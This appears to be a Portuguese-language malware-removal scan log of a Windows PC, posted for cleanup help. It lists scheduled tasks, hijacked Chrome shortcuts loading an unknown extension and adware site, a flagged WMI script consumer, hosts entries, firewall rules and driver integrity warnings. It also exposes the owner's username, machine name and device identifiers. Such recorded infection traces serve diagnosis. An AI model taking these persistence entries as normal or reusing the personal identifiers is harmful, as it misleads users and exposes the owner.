Task: C:\WINDOWS\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
WMI_ActiveScriptEventConsumer_ASEC: <===== ATENÇÃO
ShortcutWithArgument: C:\Users\vinic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\vinic\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\vinic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData2
ShortcutWithArgument: C:\Users\vinic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\vinic\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\vinic\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
==================== Módulos Carregados (Whitelisted) ==============
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-07-16 08:42 - 2017-04-23 19:56 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-07-16 08:42 - 2017-04-23 19:56 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00131768 _____ () C:\Program Files\Samsung\SamsungLink\Logger.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 02030776 _____ () C:\Program Files\Samsung\SamsungLink\SLCtxMenuExtension.dll
2016-07-16 08:42 - 2017-04-23 19:45 - 00130048 _____ () C:\WINDOWS\SYSTEM32\CHARTV.dll
2016-07-16 08:42 - 2017-04-23 19:46 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-07-16 08:43 - 2017-04-23 19:50 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 09761280 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 01400320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 01033728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 02438144 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-07-16 08:43 - 2017-04-23 19:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 02808160 _____ () C:\Program Files\Samsung\SamsungLink\scs_masi.dll
2017-04-23 23:20 - 2015-08-16 00:21 - 00162880 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-07-16 20:10 - 2016-07-16 20:10 - 00071168 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.4.86.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-07-16 20:10 - 2016-07-16 20:10 - 00157184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.4.86.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-07-16 20:10 - 2016-07-16 20:10 - 29443072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.4.86.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-24 17:23 - 2017-04-24 17:23 - 10650112 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\WinStore.Entertainment.Mobile.dll
2017-04-24 17:23 - 2017-04-24 17:23 - 02653184 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\MS.Entertainment.Common.Mobile.dll
2016-07-16 08:42 - 2017-04-23 19:52 - 00160768 _____ () C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-04-24 17:23 - 2017-04-24 17:23 - 00761344 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\WinStore.Vui.dll
2017-04-23 23:31 - 2017-04-19 02:03 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libglesv2.dll
2017-04-23 23:31 - 2017-04-19 02:03 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libegl.dll
2015-11-12 06:20 - 2015-11-12 06:20 - 00023360 _____ () C:\Program Files (x86)\Samsung\PowerCtrlManager\WSABI.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00038912 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_date_time-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00227840 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_serialization-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 01138176 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DMSManager.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00012800 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_system-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00046592 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\boost_thread-vc90-mt-1_47.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00107008 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DCMCDP.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00707072 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ContentDirectoryPresenter.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00102400 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\FolderCDP.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00041472 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DirectoryScanner.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00032768 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\Autobackup.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00055808 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\RosettaAllShare.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00078336 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\MetadataFramework.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00520234 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\sqlite3.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00450560 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\MoodExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 05717504 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\DCMImgExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00028672 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AutoChaptering.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00028160 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AudioExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00017920 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\VideoExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00012288 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ImageExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00013824 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\TextExtractor.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00147456 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libexpat.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00012288 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\VideoThumb.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00125952 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ThumbnailMaker.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00137216 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\VideoMetadataDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00024064 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\SECMetaDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00064000 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ID3Driver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00022528 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\RichInfoDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00024064 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\photoDriver.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 04671488 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\avcodec-52.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00686080 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\avformat-52.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00070656 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\avutil-50.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00152064 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\swscale-0.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00289792 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libThumbnail.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 01033216 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\ImageMagickWrapper.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00366592 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\tag.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00290816 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libKeyFrame.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00399826 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\libexif-12.dll.dll
2015-11-24 23:15 - 2015-11-24 23:15 - 00044032 _____ () C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\us.dll
2015-08-30 20:45 - 2015-08-30 20:45 - 00211064 _____ () C:\Program Files (x86)\Samsung\ColorEngine\WinMove.dll
2014-10-07 07:47 - 2014-10-07 07:47 - 00023360 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\WSABI.dll
2014-10-07 07:48 - 2014-10-07 07:48 - 00211064 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\WinCRT.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ==========================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2015-10-30 04:24 - 2017-04-24 00:18 - 00001123 ____N C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 beautifllink.xyz
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-1165987581-522194205-1901974268-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\vinic\Desktop\16508232_1325849700787395_445126336895742137_n.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está desabilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{04F70115-B707-4C38-975B-570261CF5B8F}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{357D725A-C85B-43A7-84CD-C7E1E072C6A0}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{9F830F4C-D5F1-4967-B81F-C08DE1ED37C2}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0D377A63-FE50-4E65-9F11-A32AC4BAE230}] => (Allow) LPort=16720
FirewallRules: [{22C73D6A-F379-406F-8074-DA21F3E4078B}] => (Allow) LPort=16720
FirewallRules: [{B2CA5026-AD3B-49A0-9000-DAC7FA3F0A19}] => (Allow) LPort=2869
FirewallRules: [{FF3D26D1-AE2A-4813-B5FB-B0D756D1AF8B}] => (Allow) LPort=1900
FirewallRules: [{92AF8EA7-A1CB-4469-A038-97FE13AC4B68}] => (Allow) C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AllShareFrameworkDMS.exe
FirewallRules: [{3E90A035-0A06-42C7-A61C-B180B9465EEF}] => (Allow) C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AllShareFrameworkDMS.exe
FirewallRules: [{0B67AD48-0F93-4AEF-8E3E-C43F3DCA58BC}] => (Allow) LPort=1900
FirewallRules: [{6CA47467-CB8A-40D9-9294-65DB5E455911}] => (Allow) LPort=8643
FirewallRules: [{216A24B0-5EBA-4291-B17E-5E38BBC7D537}] => (Allow) LPort=8743
FirewallRules: [{AFD1D77E-0445-45E9-B46A-57256C390FE8}] => (Allow) LPort=7679
FirewallRules: [{08EB2BC4-6DBE-4741-B715-C41B678A143B}] => (Allow) LPort=7676
FirewallRules: [{91E54303-2840-462E-AEB0-B2E28479DC1D}] => (Allow) LPort=7900
FirewallRules: [{FE43B465-B546-4CE2-AA62-9661E5929DBB}] => (Allow) LPort=24234
FirewallRules: [{B5E246BE-2BC4-43F9-A62B-FAE22727A336}] => (Allow) C:\Program Files\Samsung\SamsungLink\SamsungLinkService.exe
FirewallRules: [{968530ED-C6A1-42C8-AA2E-C760AA33911F}] => (Allow) C:\Program Files\Samsung\SamsungLink\SamsungLinkService.exe
FirewallRules: [{9A613B24-41A9-42C7-9F0E-A0E08F1E52E9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{8B31FB4A-7876-4E9A-BE37-9704AAB66893}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{396E117D-473F-457A-926A-0259B9E0B1C2}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{EDE05F3B-B88C-4695-B124-2B0A5B712D92}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{5784884F-770E-4A29-B6C0-84CAC577E4D3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{2FB0A3F3-752F-48AA-ADA0-6BB7C2784821}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{4AE7BA58-818B-41A4-9067-AE29E074FFF7}] => (Allow) C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe
FirewallRules: [{ACE256C6-570B-4509-B88B-917640BA9762}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{8A034309-A474-4C57-9301-0A3042DDDB6D}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
FirewallRules: [{09965C46-46AA-4B1F-AA71-55973AE7D134}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{E2C3CE3D-02BA-4136-876D-CA73B32A9B15}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
==================== Pontos de Restauração =========================
24-04-2017 11:02:29 Removed ColorEngine
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (04/25/2017 11:16:45 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa SpyHunter4.exe versão 4.26.12.4815 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 6d0
Hora de Início: 01d2bdcdbf9654fb
Hora de Término: 5
Caminho do Aplicativo: C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
ID do Relatório: a0a0efe2-29c1-11e7-b735-988389627684
Nome completo do pacote com falha:
ID do aplicativo relativo ao pacote com falha:
Error: (04/25/2017 11:06:23 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5F8MUG8)
Description: Falha na ativação do aplicativo Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 10:51:25 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "c:\program files (x86)\microsoft office\root\office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política c:\program files (x86)\microsoft office\root\office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (04/24/2017 08:23:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5F8MUG8)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/24/2017 08:04:52 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe". Erro no arquivo de manifesto ou de política "", na linha .
Uma versão de componente exigida pelo aplicativo está em conflito com outra versão de componente já ativa.
Os componentes conflitantes são:
Componente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.0_none_2d0f50fcbdb171b8.manifest.
Componente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.0_none_74bc87d3d22d9abe.manifest.
Error: (04/24/2017 07:37:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5F8MUG8)
Description: Falha na ativação do aplicativo Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/24/2017 07:37:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ShellExperienceHost.exe, versão: 10.0.14393.0, carimbo de data/hora: 0x578999c3
Nome do módulo com falha: twinapi.appcore.dll, versão: 10.0.14393.0, carimbo de data/hora: 0x57899849
Código de exceção: 0xc000027b
Deslocamento da falha: 0x000000000006d2c4
ID do processo com falha: 0x550
Hora de início do aplicativo com falha: 0x01d2bd4b140c401b
Caminho do aplicativo com falha: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Caminho do módulo com falha: C:\Windows\System32\twinapi.appcore.dll
ID do Relatório: f63697c7-e08f-4d69-b62b-aa9e3ba947f2
Nome completo do pacote com falha: Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy
ID do aplicativo relativo ao pacote com falha: App
Error: (04/24/2017 07:36:38 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Falha na enumeração de sessões de usuário para gerar pools de filtro.
Detalhes:
(HRESULT : 0x80040210) (0x80040210)
Error: (04/24/2017 07:36:38 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Falha na enumeração de sessões de usuário para gerar pools de filtro.
Detalhes:
(HRESULT : 0x80040210) (0x80040210)
Error: (04/24/2017 07:35:26 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Falha na enumeração de sessões de usuário para gerar pools de filtro.
Detalhes:
(HRESULT : 0x80040210) (0x80040210)
Erros de Sistema:
=============
Error: (04/25/2017 02:17:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 12:11:08 PM) (Source: BTHUSB) (EventID: 16) (User: )
Description: Falha na autenticação mútua entre o adaptador Bluetooth local e um dispositivo com endereço de adaptador Bluetooth (88:79:7e:29:26:5d).
Error: (04/25/2017 12:11:02 PM) (Source: BTHUSB) (EventID: 16) (User: )
Description: Falha na autenticação mútua entre o adaptador Bluetooth local e um dispositivo com endereço de adaptador Bluetooth (88:79:7e:29:26:5d).
Error: (04/25/2017 11:17:53 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:14:05 AM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-5F8MUG8)
Description: As configurações de permissão padrão-computador não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
e APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
ao usuário DESKTOP-5F8MUG8\vinicius SID (S-1-5-21-1165987581-522194205-1901974268-1001) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:11:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Windows Presentation Foundation Font Cache 3.0.0.0 devido ao seguinte erro:
O serviço não respondeu à requisição de início ou controle em tempo hábil.
Error: (04/25/2017 11:11:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço FontCache3.0.0.0.
Error: (04/25/2017 11:10:58 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:10:58 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:10:22 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço SamsungLinkService devido ao seguinte erro:
O serviço não respondeu à requisição de início ou controle em tempo hábil.
CodeIntegrity:
===================================
Date: 2017-04-25 11:08:45.860
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-25 11:08:39.856
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\Lace_wpf_x64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 19:31:54.129
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\32c7d8343dadb0fb9cd493a6a0cfa6a5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 19:31:53.756
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 19:31:13.391
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\Lace_wpf_x64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:48:16.968
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\32c7d8343dadb0fb9cd493a6a0cfa6a5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:48:16.745
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:48:08.236
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\Lace_wpf_x64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:40:03.942
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\32c7d8343dadb0fb9cd493a6a0cfa6a5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:40:03.704
